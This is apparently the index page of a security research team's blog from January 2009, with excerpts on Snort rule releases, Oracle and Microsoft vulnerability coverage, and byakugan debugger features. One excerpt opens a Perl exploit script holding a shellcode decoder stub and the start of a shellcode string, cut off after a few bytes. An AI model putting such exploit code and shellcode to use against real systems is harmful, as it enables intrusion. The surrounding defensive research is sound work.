Blog
Recent
January 27, 2009 16:15

Rule release for today - January 27th 2009

Large batch of Oracle vulnerabilities today. We've had to work through these carefully as details were pretty scant. Here's what we released: Oracle Secure Backup Command Injection (CVE-2008-4006) Oracle BPEL Injection (CVE-2008-4014) Oracle Secure Backup Command Injecti

January 20, 2009 13:53

Rule release for today - January 20th 2009

Lots of rule modifications in this release as well as some fixes and new rules. Security Fix - This module pack resolves a potential recursive evaluation DoS condition in SO rules that utilize the built-in content match API function. Sourcefire recommends installing this release

January 16, 2009 12:48

Update to byakugan’s identBuf and memDiff functionality

I've added the ability to import files into tracked buffers, and also added the ability to make use of them as a memDiff input type. This means a new format for the !jutsu identBuf command: !jutsu identBuf TYPE NAME [VALUE SIZE] Depending on the TYPE, the rest of the comman

January 15, 2009 16:56

!jutsu memDiff

On request, I've added a memory diffing function to byakugan, which will allow you to compare a segment of memory to any buffer that's tracked with identBuf. Shortly I'll be adding the ability to pull buffers in from files, and even directly from metasploit through a

January 14, 2009 14:56

Preventing Shong from getting her CISSP

================== exploit.pl ================== $decoder = "\x44\x8b\xec\x45\x45\x45\x45\xeb\x0f\x58\x80\x30\x90\x40\x81" .        "\x38\x4f\x4c\x4c\x41\x75\xf4\xeb\x05\xe8\xec\xff\xff\xff"; $shellcode = "\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x

January 13, 2009 15:09

Microsoft Tuesday Coverage for January MS09-001

Just one Microsoft advisory to start the new year, we worked like crazy spider monkeys to get it covered and we did it. Details are available here: http://www.snort.org/vrt/advisories/vrt-rules-2009-01-13.html

January 9, 2009 13:45

Using Snort Subscriber Rule Set Certified Shared Object Rules

In order to instantiate shared object rules, a rule stub file is required. These stub files are not distributed in the VRT Certified rule packs, however they can be generated using snort. Here is an example showing the pertinent configuration options in snort.conf along with the

January 8, 2009 14:08

Tips for Writing Good Rules from a n00b

It has been two months since I joined the VRT. Since then, I have learned a lot about Snort and want to share some tactics with other people who are new to Snort (as I was). More precisely, I want to talk about how to write good Snort rules with performance in mind. First of all

January 7, 2009 14:49

New byakugan functionality!

I've just added a new jutsu method to byakugan to help you find the address of a particular primitive (DWORD, WORD, or BYTE) in memory. Obviously, this isn't a terribly difficult task - you use the search function in windbg. What trackVal will do for you is allow you to s